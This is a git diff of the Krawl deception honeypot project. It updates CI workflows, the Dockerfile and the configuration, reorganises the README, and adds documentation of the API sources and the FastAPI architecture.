diff --git a/.github/workflows/pr-checks.yml b/.github/workflows/pr-checks.yml index 9feb01c..d899b13 100644 --- a/.github/workflows/pr-checks.yml +++ b/.github/workflows/pr-checks.yml @@ -20,7 +20,7 @@ jobs: - uses: actions/setup-python@v5 with: - python-version: '3.11' + python-version: '3.13' cache: 'pip' - name: Install dependencies diff --git a/.github/workflows/security-scan.yml b/.github/workflows/security-scan.yml index 732b1b7..3048e62 100644 --- a/.github/workflows/security-scan.yml +++ b/.github/workflows/security-scan.yml @@ -19,7 +19,7 @@ jobs: - uses: actions/setup-python@v5 with: - python-version: '3.11' + python-version: '3.13' cache: 'pip' - name: Install dependencies @@ -48,12 +48,4 @@ jobs: - name: Safety check for dependencies run: safety check --json || true - - - name: Trivy vulnerability scan - uses: aquasecurity/trivy-action@master - with: - scan-type: 'fs' - scan-ref: '.' - format: 'table' - severity: 'CRITICAL,HIGH' - exit-code: '1' + \ No newline at end of file diff --git a/.gitignore b/.gitignore index 6249e18..109cf28 100644 --- a/.gitignore +++ b/.gitignore @@ -68,6 +68,7 @@ data/ *.db *.sqlite *.sqlite3 +backups/ # Temporary files *.tmp @@ -80,4 +81,7 @@ personal-values.yaml #exports dir (keeping .gitkeep so we have the dir) /exports/* -/src/exports/* \ No newline at end of file +/src/exports/* + +# tmux config +.tmux.conf diff --git a/Dockerfile b/Dockerfile index 4015c74..e93a55c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,15 +1,16 @@ -FROM python:3.11-slim +FROM python:3.13-slim LABEL org.opencontainers.image.source=https://github.com/BlessedRebuS/Krawl WORKDIR /app # Install gosu for dropping privileges -RUN apt-get update && apt-get install -y --no-install-recommends gosu && \ +RUN apt-get update && apt-get upgrade -y && apt-get install -y --no-install-recommends gosu && \ rm -rf /var/lib/apt/lists/* COPY requirements.txt /app/ -RUN pip install --no-cache-dir -r requirements.txt +RUN pip install --no-cache-dir --upgrade pip && 
\ + pip install --no-cache-dir -r requirements.txt COPY src/ /app/src/ COPY wordlists.json /app/ @@ -26,4 +27,4 @@ EXPOSE 5000 ENV PYTHONUNBUFFERED=1 ENTRYPOINT ["/app/entrypoint.sh"] -CMD ["python3", "src/server.py"] +CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "5000", "--app-dir", "src"] diff --git a/README.md b/README.md index 28c45ca..4dc5702 100644 --- a/README.md +++ b/README.md @@ -33,21 +33,25 @@ Helm Chart - -
- -

- What is Krawl? • - Installation • - Honeypot Pages • - Dashboard • - Todo • - Contributing -

- -
+## Table of Contents +- [Demo](#demo) +- [What is Krawl?](#what-is-krawl) +- [Krawl Dashboard](#krawl-dashboard) +- [Installation](#-installation) + - [Docker Run](#docker-run) + - [Docker Compose](#docker-compose) + - [Kubernetes](#kubernetes) +- [Configuration](#configuration) + - [config.yaml](#configuration-via-configyaml) + - [Environment Variables](#configuration-via-enviromental-variables) +- [Ban Malicious IPs](#use-krawl-to-ban-malicious-ips) +- [IP Reputation](#ip-reputation) +- [Forward Server Header](#forward-server-header) +- [Additional Documentation](#additional-documentation) +- [Contributing](#-contributing) + ## Demo Tip: crawl the `robots.txt` paths for additional fun ### Krawl URL: [http://demo.krawlme.com](http://demo.krawlme.com) @@ -67,7 +71,7 @@ It features: - **Fake Login Pages**: WordPress, phpMyAdmin, admin panels - **Honeypot Paths**: Advertised in robots.txt to catch scanners - **Fake Credentials**: Realistic-looking usernames, passwords, API keys -- **[Canary Token](#customizing-the-canary-token) Integration**: External alert triggering +- **[Canary Token](docs/canary-token.md) Integration**: External alert triggering - **Random server headers**: Confuse attacks based on server header and version - **Real-time Dashboard**: Monitor suspicious activity - **Customizable Wordlists**: Easy JSON-based configuration @@ -75,8 +79,28 @@ It features: ![dashboard](img/deception-page.png) + +## Krawl Dashboard + +Krawl provides a comprehensive dashboard, accessible at a **random secret path** generated at startup or at a **custom path** configured via `KRAWL_DASHBOARD_SECRET_PATH`. This keeps the dashboard hidden from attackers scanning your honeypot. + +The dashboard is organized in three main tabs: + +- **Overview** — High-level view of attack activity: an interactive map of IP origins, recent suspicious requests, and top IPs, User-Agents, and paths. 
+ ![geoip](img/geoip_dashboard.png) +- **Attacks** — Detailed breakdown of captured credentials, honeypot triggers, and detected attack types (SQLi, XSS, path traversal, etc.) with charts and tables. + +![attack_types](img/attack_types.png) + +- **IP Insight** — In-depth forensic view of a selected IP: geolocation, ISP/ASN info, reputation flags, behavioral timeline, attack type distribution, and full access history. + +![ipinsight](img/ip_insight_dashboard.png) + +For more details, see the [Dashboard documentation](docs/dashboard.md). + + ## 🚀 Installation ### Docker Run @@ -89,7 +113,7 @@ docker run -d \ -e KRAWL_PORT=5000 \ -e KRAWL_DELAY=100 \ -e KRAWL_DASHBOARD_SECRET_PATH="/my-secret-dashboard" \ - -e KRAWL_DATABASE_RETENTION_DAYS=30 \ + -v krawl-data:/app/data \ --name krawl \ ghcr.io/blessedrebus/krawl:latest ``` @@ -112,6 +136,8 @@ services: - TZ=Europe/Rome volumes: - ./config.yaml:/app/config.yaml:ro + # bind mount for firewall exporters + - ./exports:/app/exports - krawl-data:/app/data restart: unless-stopped @@ -134,6 +160,75 @@ docker-compose down ### Kubernetes **Krawl is also available natively on Kubernetes**. Installation can be done either [via manifest](kubernetes/README.md) or [using the helm chart](helm/README.md). + +## Configuration +Krawl uses a **configuration hierarchy** in which **environment variables take precedence over the configuration file**. This approach is recommended for Docker deployments and quick out-of-the-box customization. + +### Configuration via config.yaml +You can use the [config.yaml](config.yaml) file for advanced configurations, such as Docker Compose or Helm chart deployments. 
+ +### Configuration via Enviromental Variables + +| Environment Variable | Description | Default | +|----------------------|-------------|---------| +| `CONFIG_LOCATION` | Path to yaml config file | `config.yaml` | +| `KRAWL_PORT` | Server listening port | `5000` | +| `KRAWL_DELAY` | Response delay in milliseconds | `100` | +| `KRAWL_SERVER_HEADER` | HTTP Server header for deception | `""` | +| `KRAWL_LINKS_LENGTH_RANGE` | Link length range as `min,max` | `5,15` | +| `KRAWL_LINKS_PER_PAGE_RANGE` | Links per page as `min,max` | `10,15` | +| `KRAWL_CHAR_SPACE` | Characters used for link generation | `abcdefgh...` | +| `KRAWL_MAX_COUNTER` | Initial counter value | `10` | +| `KRAWL_CANARY_TOKEN_URL` | External canary token URL | None | +| `KRAWL_CANARY_TOKEN_TRIES` | Requests before showing canary token | `10` | +| `KRAWL_DASHBOARD_SECRET_PATH` | Custom dashboard path | Auto-generated | +| `KRAWL_PROBABILITY_ERROR_CODES` | Error response probability (0-100%) | `0` | +| `KRAWL_DATABASE_PATH` | Database file location | `data/krawl.db` | +| `KRAWL_EXPORTS_PATH` | Path where firewall rule sets are exported | `exports` | +| `KRAWL_BACKUPS_PATH` | Path where database dumps are saved | `backups` | +| `KRAWL_BACKUPS_CRON` | Cron expression to control backup job schedule | `*/30 * * * *` | +| `KRAWL_BACKUPS_ENABLED` | Boolean to enable db dump job | `true` | +| `KRAWL_DATABASE_RETENTION_DAYS` | Days to retain data in database | `30` | +| `KRAWL_HTTP_RISKY_METHODS_THRESHOLD` | Threshold for risky HTTP methods detection | `0.1` | +| `KRAWL_VIOLATED_ROBOTS_THRESHOLD` | Threshold for robots.txt violations | `0.1` | +| `KRAWL_UNEVEN_REQUEST_TIMING_THRESHOLD` | Coefficient of variation threshold for timing | `0.5` | +| `KRAWL_UNEVEN_REQUEST_TIMING_TIME_WINDOW_SECONDS` | Time window for request timing analysis in seconds | `300` | +| `KRAWL_USER_AGENTS_USED_THRESHOLD` | Threshold for detecting multiple user agents | `2` | +| `KRAWL_ATTACK_URLS_THRESHOLD` | Threshold for attack URL 
detection | `1` | +| `KRAWL_INFINITE_PAGES_FOR_MALICIOUS` | Serve infinite pages to malicious IPs | `true` | +| `KRAWL_MAX_PAGES_LIMIT` | Maximum page limit for crawlers | `250` | +| `KRAWL_BAN_DURATION_SECONDS` | Ban duration in seconds for rate-limited IPs | `600` | + +For example + +```bash +# Set canary token +export CONFIG_LOCATION="config.yaml" +export KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" + +# Set number of pages range (min,max format) +export KRAWL_LINKS_PER_PAGE_RANGE="5,25" + +# Set analyzer thresholds +export KRAWL_HTTP_RISKY_METHODS_THRESHOLD="0.2" +export KRAWL_VIOLATED_ROBOTS_THRESHOLD="0.15" + +# Set custom dashboard path +export KRAWL_DASHBOARD_SECRET_PATH="/my-secret-dashboard" +``` + +Example of a Docker run with env variables: + +```bash +docker run -d \ + -p 5000:5000 \ + -e KRAWL_PORT=5000 \ + -e KRAWL_DELAY=100 \ + -e KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" \ + --name krawl \ + ghcr.io/blessedrebus/krawl:latest +``` + ## Use Krawl to Ban Malicious IPs Krawl uses a reputation-based system to classify attacker IP addresses. Every five minutes, Krawl exports the identified malicious IPs to a `malicious_ips.txt` file. @@ -143,7 +238,11 @@ This file can either be mounted from the Docker container into another system or curl https://your-krawl-instance//api/download/malicious_ips.txt ``` -This file can be used to [update a set of firewall rules](https://www.allthingstech.ch/using-opnsense-and-ip-blocklists-to-block-malicious-traffic), for example on OPNsense and pfSense, enabling automatic blocking of malicious IPs or using IPtables +This file enables automatic blocking of malicious traffic across various platforms. 
You can use it to update firewall rules on: +* [OPNsense and pfSense](https://www.allthingstech.ch/using-opnsense-and-ip-blocklists-to-block-malicious-traffic) +* [RouterOS](https://rentry.co/krawl-routeros) +* [IPtables](plugins/iptables/README.md) and [Nftables](plugins/nftables/README.md) +* [Fail2Ban](plugins/fail2ban/README.md) ## IP Reputation Krawl [uses tasks that analyze recent traffic to build and continuously update an IP reputation](src/tasks/analyze_ips.py) score. It runs periodically and evaluates each active IP address based on multiple behavioral indicators to classify it as an attacker, crawler, or regular user. Thresholds are fully customizable. @@ -176,194 +275,17 @@ location / { } ``` -## API -Krawl uses the following APIs -- https://iprep.lcrawl.com (IP Reputation) -- https://nominatim.openstreetmap.org/reverse (Reverse IP Lookup) -- https://api.ipify.org (Public IP discovery) -- http://ident.me (Public IP discovery) -- https://ifconfig.me (Public IP discovery) +## Additional Documentation -## Configuration -Krawl uses a **configuration hierarchy** in which **environment variables take precedence over the configuration file**. This approach is recommended for Docker deployments and quick out-of-the-box customization. 
- -### Configuration via Enviromental Variables - -| Environment Variable | Description | Default | -|----------------------|-------------|---------| -| `CONFIG_LOCATION` | Path to yaml config file | `config.yaml` | -| `KRAWL_PORT` | Server listening port | `5000` | -| `KRAWL_DELAY` | Response delay in milliseconds | `100` | -| `KRAWL_SERVER_HEADER` | HTTP Server header for deception | `""` | -| `KRAWL_LINKS_LENGTH_RANGE` | Link length range as `min,max` | `5,15` | -| `KRAWL_LINKS_PER_PAGE_RANGE` | Links per page as `min,max` | `10,15` | -| `KRAWL_CHAR_SPACE` | Characters used for link generation | `abcdefgh...` | -| `KRAWL_MAX_COUNTER` | Initial counter value | `10` | -| `KRAWL_CANARY_TOKEN_URL` | External canary token URL | None | -| `KRAWL_CANARY_TOKEN_TRIES` | Requests before showing canary token | `10` | -| `KRAWL_DASHBOARD_SECRET_PATH` | Custom dashboard path | Auto-generated | -| `KRAWL_PROBABILITY_ERROR_CODES` | Error response probability (0-100%) | `0` | -| `KRAWL_DATABASE_PATH` | Database file location | `data/krawl.db` | -| `KRAWL_DATABASE_RETENTION_DAYS` | Days to retain data in database | `30` | -| `KRAWL_HTTP_RISKY_METHODS_THRESHOLD` | Threshold for risky HTTP methods detection | `0.1` | -| `KRAWL_VIOLATED_ROBOTS_THRESHOLD` | Threshold for robots.txt violations | `0.1` | -| `KRAWL_UNEVEN_REQUEST_TIMING_THRESHOLD` | Coefficient of variation threshold for timing | `0.5` | -| `KRAWL_UNEVEN_REQUEST_TIMING_TIME_WINDOW_SECONDS` | Time window for request timing analysis in seconds | `300` | -| `KRAWL_USER_AGENTS_USED_THRESHOLD` | Threshold for detecting multiple user agents | `2` | -| `KRAWL_ATTACK_URLS_THRESHOLD` | Threshold for attack URL detection | `1` | -| `KRAWL_INFINITE_PAGES_FOR_MALICIOUS` | Serve infinite pages to malicious IPs | `true` | -| `KRAWL_MAX_PAGES_LIMIT` | Maximum page limit for crawlers | `250` | -| `KRAWL_BAN_DURATION_SECONDS` | Ban duration in seconds for rate-limited IPs | `600` | - -For example - -```bash -# Set canary token -export 
CONFIG_LOCATION="config.yaml" -export KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" - -# Set number of pages range (min,max format) -export KRAWL_LINKS_PER_PAGE_RANGE="5,25" - -# Set analyzer thresholds -export KRAWL_HTTP_RISKY_METHODS_THRESHOLD="0.2" -export KRAWL_VIOLATED_ROBOTS_THRESHOLD="0.15" - -# Set custom dashboard path -export KRAWL_DASHBOARD_SECRET_PATH="/my-secret-dashboard" -``` - -Example of a Docker run with env variables: - -```bash -docker run -d \ - -p 5000:5000 \ - -e KRAWL_PORT=5000 \ - -e KRAWL_DELAY=100 \ - -e KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" \ - --name krawl \ - ghcr.io/blessedrebus/krawl:latest -``` - -### Configuration via config.yaml -You can use the [config.yaml](config.yaml) file for more advanced configurations, such as Docker Compose or Helm chart deployments. - -# Honeypot -Below is a complete overview of the Krawl honeypot’s capabilities - -## robots.txt -The actual (juicy) robots.txt configuration [is the following](src/templates/html/robots.txt). - -## Honeypot pages -Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing). - -![admin page](img/admin-page.png) - - -Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with “interesting” files, each assigned a random file size to look realistic. - -![directory-page](img/directory-page.png) - -The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a “juicy” misconfiguration that crawlers and scanners often flag as information leakage. - -The `/server` page displays randomly generated fake error information for each known server. 
- -![server and env page](img/server-and-env-page.png) - -The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format - -![users and secrets](img/users-and-secrets.png) - -The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets - -![credentials and passwords](img/credentials-and-passwords.png) - -Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**. - -![sql injection](img/sql_injection.png) - -Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard. - -## Example usage behind reverse proxy - -You can configure a reverse proxy so all web requests land on the Krawl page by default, and hide your real content behind a secret hidden url. For example: - -```bash -location / { - proxy_pass https://your-krawl-instance; - proxy_pass_header Server; -} - -location /my-hidden-service { - proxy_pass https://my-hidden-service; - proxy_pass_header Server; -} -``` - -Alternatively, you can create a bunch of different "interesting" looking domains. For example: - -- admin.example.com -- portal.example.com -- sso.example.com -- login.example.com -- ... - -Additionally, you may configure your reverse proxy to forward all non-existing subdomains (e.g. nonexistent.example.com) to one of these domains so that any crawlers that are guessing domains at random will automatically end up at your Krawl instance. - -## Customizing the Canary Token -To create a custom canary token, visit https://canarytokens.org - -and generate a “Web bug” canary token. - -This optional token is triggered when a crawler fully traverses the webpage until it reaches 0. At that point, a URL is returned. 
When this URL is requested, it sends an alert to the user via email, including the visitor’s IP address and user agent. - - -To enable this feature, set the canary token URL [using the environment variable](#configuration-via-environment-variables) `KRAWL_CANARY_TOKEN_URL`. - -## Customizing the wordlist - -Edit `wordlists.json` to customize fake data for your use case - -```json -{ - "usernames": { - "prefixes": ["admin", "root", "user"], - "suffixes": ["_prod", "_dev", "123"] - }, - "passwords": { - "prefixes": ["P@ssw0rd", "Admin"], - "simple": ["test", "password"] - }, - "directory_listing": { - "files": ["credentials.txt", "backup.sql"], - "directories": ["admin/", "backup/"] - } -} -``` - -or **values.yaml** in the case of helm chart installation - -## Dashboard - -Access the dashboard at `http://:/` - -The dashboard shows: -- Total and unique accesses -- Suspicious activity and attack detection -- Top IPs, paths, user-agents and GeoIP localization -- Real-time monitoring - -The attackers’ access to the honeypot endpoint and related suspicious activities (such as failed login attempts) are logged. - -Krawl also implements a scoring system designed to distinguish between malicious and legitimate behavior on the website. 
- -![dashboard-1](img/dashboard-1.png) - -The top IP Addresses is shown along with top paths and User Agents - -![dashboard-2](img/dashboard-2.png) - -![dashboard-3](img/dashboard-3.png) +| Topic | Description | +|-------|-------------| +| [API](docs/api.md) | External APIs used by Krawl for IP data, reputation, and geolocation | +| [Honeypot](docs/honeypot.md) | Full overview of honeypot pages: fake logins, directory listings, credential files, SQLi/XSS/XXE/command injection traps, and more | +| [Reverse Proxy](docs/reverse-proxy.md) | How to deploy Krawl behind NGINX or use decoy subdomains | +| [Database Backups](docs/backups.md) | Enable and configure the automatic database dump job | +| [Canary Token](docs/canary-token.md) | Set up external alert triggers via canarytokens.org | +| [Wordlist](docs/wordlist.md) | Customize fake usernames, passwords, and directory listings | +| [Dashboard](docs/dashboard.md) | Access and explore the real-time monitoring dashboard | ## 🤝 Contributing @@ -374,13 +296,9 @@ Contributions welcome! Please: 4. Submit a pull request (explain the changes!) -
- -## ⚠️ Disclaimer - -**This is a deception/honeypot system.** -Deploy in isolated environments and monitor carefully for security events. -Use responsibly and in compliance with applicable laws and regulations. +## Disclaimer +> [!CAUTION] +> This is a deception/honeypot system. Deploy in isolated environments and monitor carefully for security events. Use responsibly and in compliance with applicable laws and regulations. ## Star History -Star History Chart +Star History Chart \ No newline at end of file diff --git a/ToDo.md b/ToDo.md deleted file mode 100644 index 49e8d68..0000000 --- a/ToDo.md +++ /dev/null @@ -1,5 +0,0 @@ -# Krawl - Todo List - -- Add Prometheus exporter for metrics -- Add POST cresentials information (eg: username and password used) -- Add CloudFlare error pages \ No newline at end of file diff --git a/config.yaml b/config.yaml index c29ebe4..dd61720 100644 --- a/config.yaml +++ b/config.yaml @@ -23,7 +23,18 @@ dashboard: # if set to "null" this will Auto-generates random path if not set # can be set to "/dashboard" or similar <-- note this MUST include a forward slash # secret_path: super-secret-dashboard-path - secret_path: test + secret_path: null + +backups: + path: "backups" + cron: "*/30 * * * *" + enabled: false + +exports: + path: "exports" + +logging: + level: "DEBUG" # DEBUG, INFO, WARNING, ERROR, CRITICAL database: path: "data/krawl.db" @@ -43,4 +54,4 @@ analyzer: crawl: infinite_pages_for_malicious: true max_pages_limit: 250 - ban_duration_seconds: 600 \ No newline at end of file + ban_duration_seconds: 600 diff --git a/docker-compose.yaml b/docker-compose.yaml index 233692b..17680de 100644 --- a/docker-compose.yaml +++ b/docker-compose.yaml @@ -1,4 +1,5 @@ --- +# THIS IS FOR DEVELOPMENT PURPOSES services: krawl: build: @@ -16,17 +17,14 @@ services: - ./config.yaml:/app/config.yaml:ro - ./logs:/app/logs - ./exports:/app/exports - - data:/app/data + - ./data:/app/data + - ./backups:/app/backups restart: unless-stopped develop: 
watch: - path: ./Dockerfile action: rebuild - path: ./src/ - action: sync+restart - target: /app/src + action: rebuild - path: ./docker-compose.yaml action: rebuild - -volumes: - data: diff --git a/docs/api.md b/docs/api.md new file mode 100644 index 0000000..8d4ab18 --- /dev/null +++ b/docs/api.md @@ -0,0 +1,9 @@ +# API + +Krawl uses the following APIs +- http://ip-api.com (IP Data) +- https://iprep.lcrawl.com (IP Reputation) +- https://nominatim.openstreetmap.org/reverse (Reverse IP Lookup) +- https://api.ipify.org (Public IP discovery) +- http://ident.me (Public IP discovery) +- https://ifconfig.me (Public IP discovery) diff --git a/docs/architecture.md b/docs/architecture.md new file mode 100644 index 0000000..75b7296 --- /dev/null +++ b/docs/architecture.md @@ -0,0 +1,372 @@ +# Krawl Architecture + +## Overview + +Krawl is a cloud-native deception honeypot server built on **FastAPI**. It creates realistic fake web applications (admin panels, login pages, fake credentials) to attract, detect, and analyze malicious crawlers and attackers while wasting their resources with infinite spider-trap pages. 
+ +## Tech Stack + +| Layer | Technology | +|-------|-----------| +| **Backend** | FastAPI, Uvicorn, Python 3.13 | +| **ORM / DB** | SQLAlchemy 2.0, SQLite (WAL mode) | +| **Templating** | Jinja2 (server-side rendering) | +| **Reactivity** | Alpine.js 3.14 | +| **Partial Updates** | HTMX 2.0 | +| **Charts** | Chart.js 3.9 (doughnut), custom SVG radar | +| **Maps** | Leaflet 1.9 + CartoDB dark tiles | +| **Scheduling** | APScheduler | +| **Container** | Docker (python:3.13-slim), Helm/K8s ready | + +## Directory Structure + +``` +Krawl/ +├── src/ +│ ├── app.py # FastAPI app factory + lifespan +│ ├── config.py # YAML + env config loader +│ ├── dependencies.py # DI providers (templates, DB, client IP) +│ ├── database.py # DatabaseManager singleton +│ ├── models.py # SQLAlchemy ORM models +│ ├── tracker.py # In-memory + DB access tracking +│ ├── logger.py # Rotating file log handlers +│ ├── deception_responses.py # Attack detection + fake responses +│ ├── sanitizer.py # Input sanitization +│ ├── generators.py # Random content generators +│ ├── wordlists.py # JSON wordlist loader +│ ├── geo_utils.py # IP geolocation API +│ ├── ip_utils.py # IP validation +│ │ +│ ├── routes/ +│ │ ├── honeypot.py # Trap pages, credential capture, catch-all +│ │ ├── dashboard.py # Dashboard page (Jinja2 SSR) +│ │ ├── api.py # JSON API endpoints +│ │ └── htmx.py # HTMX HTML fragment endpoints +│ │ +│ ├── middleware/ +│ │ ├── deception.py # Path traversal / XXE / cmd injection detection +│ │ └── ban_check.py # Banned IP enforcement +│ │ +│ ├── tasks/ # APScheduler background jobs +│ │ ├── analyze_ips.py # IP categorization scoring +│ │ ├── fetch_ip_rep.py # Geolocation + blocklist enrichment +│ │ ├── db_dump.py # Database export +│ │ ├── memory_cleanup.py # In-memory list trimming +│ │ └── top_attacking_ips.py # Top attacker caching +│ │ +│ ├── tasks_master.py # Task discovery + APScheduler orchestrator +│ ├── firewall/ # Banlist export (iptables, raw) +│ ├── migrations/ # Schema migrations 
(auto-run) +│ │ +│ └── templates/ +│ ├── jinja2/ +│ │ ├── base.html # Layout + CDN scripts +│ │ └── dashboard/ +│ │ ├── index.html # Main dashboard page +│ │ └── partials/ # 13 HTMX fragment templates +│ ├── html/ # Deceptive trap page templates +│ └── static/ +│ ├── css/dashboard.css +│ └── js/ +│ ├── dashboard.js # Alpine.js app controller +│ ├── map.js # Leaflet map +│ ├── charts.js # Chart.js doughnut +│ └── radar.js # SVG radar chart +│ +├── config.yaml # Application configuration +├── wordlists.json # Attack patterns + fake credentials +├── Dockerfile # Container build +├── docker-compose.yaml # Local orchestration +├── entrypoint.sh # Container startup (gosu privilege drop) +├── kubernetes/ # K8s manifests +└── helm/ # Helm chart +``` + +## Application Entry Point + +`src/app.py` uses the **FastAPI application factory** pattern with an async lifespan manager: + +``` +Startup Shutdown + │ │ + ├─ Initialize logging └─ Log shutdown + ├─ Initialize SQLite DB + ├─ Create AccessTracker + ├─ Load webpages file (optional) + ├─ Store config + tracker in app.state + ├─ Start APScheduler background tasks + └─ Log dashboard URL +``` + +## Request Pipeline + +``` + Request + │ + ▼ +┌──────────────────────┐ +│ BanCheckMiddleware │──→ IP banned? → Return 500 +└──────────┬───────────┘ + ▼ +┌──────────────────────┐ +│ DeceptionMiddleware │──→ Attack detected? → Fake error response +└──────────┬───────────┘ + ▼ +┌───────────────────────┐ +│ ServerHeaderMiddleware│──→ Add random Server header +└──────────┬────────────┘ + ▼ +┌───────────────────────┐ +│ Route Matching │ +│ (ordered by priority)│ +│ │ +│ 1. Static files │ /{secret}/static/* +│ 2. Dashboard router │ /{secret}/ (prefix-based) +│ 3. API router │ /{secret}/api/* (prefix-based) +│ 4. HTMX router │ /{secret}/htmx/* (prefix-based) +│ 5. Honeypot router │ /* (catch-all) +└───────────────────────┘ +``` + +### Prefix-Based Routing + +Dashboard, API, and HTMX routers are mounted with `prefix=f"/{secret}"` in `app.py`. 
This means: +- Route handlers define paths **without** the secret (e.g., `@router.get("/api/all-ips")`) +- FastAPI prepends the secret automatically (e.g., `GET /a1b2c3/api/all-ips`) +- The honeypot catch-all `/{path:path}` only matches paths that **don't** start with the secret +- No `_is_dashboard_path()` checks needed — the prefix handles access scoping + +## Route Architecture + +### Honeypot Routes (`routes/honeypot.py`) + +| Method | Path | Response | +|--------|------|----------| +| `GET` | `/{path:path}` | Trap page with random links (catch-all) | +| `HEAD` | `/{path:path}` | 200 OK | +| `POST` | `/{path:path}` | Credential capture | +| `GET` | `/admin`, `/login` | Fake login form | +| `GET` | `/wp-admin`, `/wp-login.php` | Fake WordPress login | +| `GET` | `/phpmyadmin` | Fake phpMyAdmin | +| `GET` | `/robots.txt` | Honeypot paths advertised | +| `GET/POST` | `/api/search`, `/api/sql` | SQL injection honeypot | +| `POST` | `/api/contact` | XSS detection endpoint | +| `GET` | `/.env`, `/credentials.txt` | Fake sensitive files | + +### Dashboard Routes (`routes/dashboard.py`) + +| Method | Path | Response | +|--------|------|----------| +| `GET` | `/` | Server-rendered dashboard (Jinja2) | + +### API Routes (`routes/api.py`) + +| Method | Path | Response | +|--------|------|----------| +| `GET` | `/api/all-ips` | Paginated IP list with stats | +| `GET` | `/api/attackers` | Paginated attacker IPs | +| `GET` | `/api/ip-stats/{ip}` | Single IP detail | +| `GET` | `/api/credentials` | Captured credentials | +| `GET` | `/api/honeypot` | Honeypot trigger counts | +| `GET` | `/api/top-ips` | Top requesting IPs | +| `GET` | `/api/top-paths` | Most requested paths | +| `GET` | `/api/top-user-agents` | Top user agents | +| `GET` | `/api/attack-types-stats` | Attack type distribution | +| `GET` | `/api/attack-types` | Paginated attack log | +| `GET` | `/api/raw-request/{id}` | Full HTTP request | +| `GET` | `/api/get_banlist` | Export ban rules | + +### HTMX Fragment 
Routes (`routes/htmx.py`) + +Each returns a server-rendered Jinja2 partial (`hx-swap="innerHTML"`): + +| Path | Template | +|------|----------| +| `/htmx/honeypot` | `honeypot_table.html` | +| `/htmx/top-ips` | `top_ips_table.html` | +| `/htmx/top-paths` | `top_paths_table.html` | +| `/htmx/top-ua` | `top_ua_table.html` | +| `/htmx/attackers` | `attackers_table.html` | +| `/htmx/credentials` | `credentials_table.html` | +| `/htmx/attacks` | `attack_types_table.html` | +| `/htmx/patterns` | `patterns_table.html` | +| `/htmx/ip-detail/{ip}` | `ip_detail.html` | + +## Database Schema + +``` +┌─────────────────┐ ┌──────────────────┐ +│ AccessLog │ │ AttackDetection │ +├─────────────────┤ ├──────────────────┤ +│ id (PK) │◄────│ access_log_id(FK)│ +│ ip (indexed) │ │ attack_type │ +│ path │ │ matched_pattern │ +│ user_agent │ └──────────────────┘ +│ method │ +│ is_suspicious │ ┌──────────────────┐ +│ is_honeypot │ │CredentialAttempt │ +│ timestamp │ ├──────────────────┤ +│ raw_request │ │ id (PK) │ +└─────────────────┘ │ ip (indexed) │ + │ path, username │ +┌─────────────────┐ │ password │ +│ IpStats │ │ timestamp │ +├─────────────────┤ └──────────────────┘ +│ ip (PK) │ +│ total_requests │ ┌──────────────────┐ +│ first/last_seen │ │ CategoryHistory │ +│ country_code │ ├──────────────────┤ +│ city, lat, lon │ │ id (PK) │ +│ asn, asn_org │ │ ip (indexed) │ +│ isp, reverse │ │ old_category │ +│ is_proxy │ │ new_category │ +│ is_hosting │ │ timestamp │ +│ list_on (JSON) │ └──────────────────┘ +│ category │ +│ category_scores │ +│ analyzed_metrics│ +│ manual_category │ +└─────────────────┘ +``` + +**SQLite config:** WAL mode, 30s busy timeout, file permissions 600. 
+ +## Frontend Architecture + +``` +base.html + ├── CDN: Leaflet, Chart.js, HTMX, Alpine.js (deferred) + ├── Static: dashboard.css + │ + └── dashboard/index.html (extends base) + │ + ├── Stats cards ──────────── Server-rendered on page load + ├── Suspicious table ─────── Server-rendered on page load + │ + ├── Overview tab (Alpine.js x-show) + │ ├── Honeypot table ───── HTMX hx-get on load + │ ├── Top IPs table ────── HTMX hx-get on load + │ ├── Top Paths table ──── HTMX hx-get on load + │ ├── Top UA table ─────── HTMX hx-get on load + │ └── Credentials table ── HTMX hx-get on load + │ + └── Attacks tab (Alpine.js x-show, lazy init) + ├── Attackers table ──── HTMX hx-get on load + ├── Map ──────────────── Leaflet (init on tab switch) + ├── Chart ────────────── Chart.js (init on tab switch) + ├── Attack types table ─ HTMX hx-get on load + └── Patterns table ───── HTMX hx-get on load +``` + +**Responsibility split:** +- **Alpine.js** — Tab state, modals, dropdowns, lazy initialization +- **HTMX** — Table pagination, sorting, IP detail expansion +- **Leaflet** — Interactive map with category-colored markers +- **Chart.js** — Doughnut chart for attack type distribution +- **Custom SVG** — Radar charts for IP category scores + +## Background Tasks + +Managed by `TasksMaster` (APScheduler). Tasks are auto-discovered from `src/tasks/`. 
+ +| Task | Schedule | Purpose | +|------|----------|---------| +| `analyze_ips` | Every 1 min | Score IPs into categories (attacker, crawler, user) | +| `fetch_ip_rep` | Every 5 min | Enrich IPs with geolocation + blocklist data | +| `db_dump` | Configurable | Export database backups | +| `memory_cleanup` | Periodic | Trim in-memory lists | +| `top_attacking_ips` | Periodic | Cache top attackers | + +### IP Categorization Model + +Each IP is scored across 4 categories based on: +- HTTP method distribution (risky methods ratio) +- Robots.txt violations +- Request timing anomalies (coefficient of variation) +- User-Agent diversity +- Attack URL detection + +Categories: `attacker`, `bad_crawler`, `good_crawler`, `regular_user`, `unknown` + +## Configuration + +`config.yaml` with environment variable overrides (`KRAWL_{FIELD}`): + +```yaml +server: + port: 5000 + delay: 100 # Response delay (ms) + +dashboard: + secret_path: "test" # Auto-generates if null + +database: + path: "data/krawl.db" + retention_days: 30 + +crawl: + infinite_pages_for_malicious: true + max_pages_limit: 250 + ban_duration_seconds: 600 + +behavior: + probability_error_codes: 0 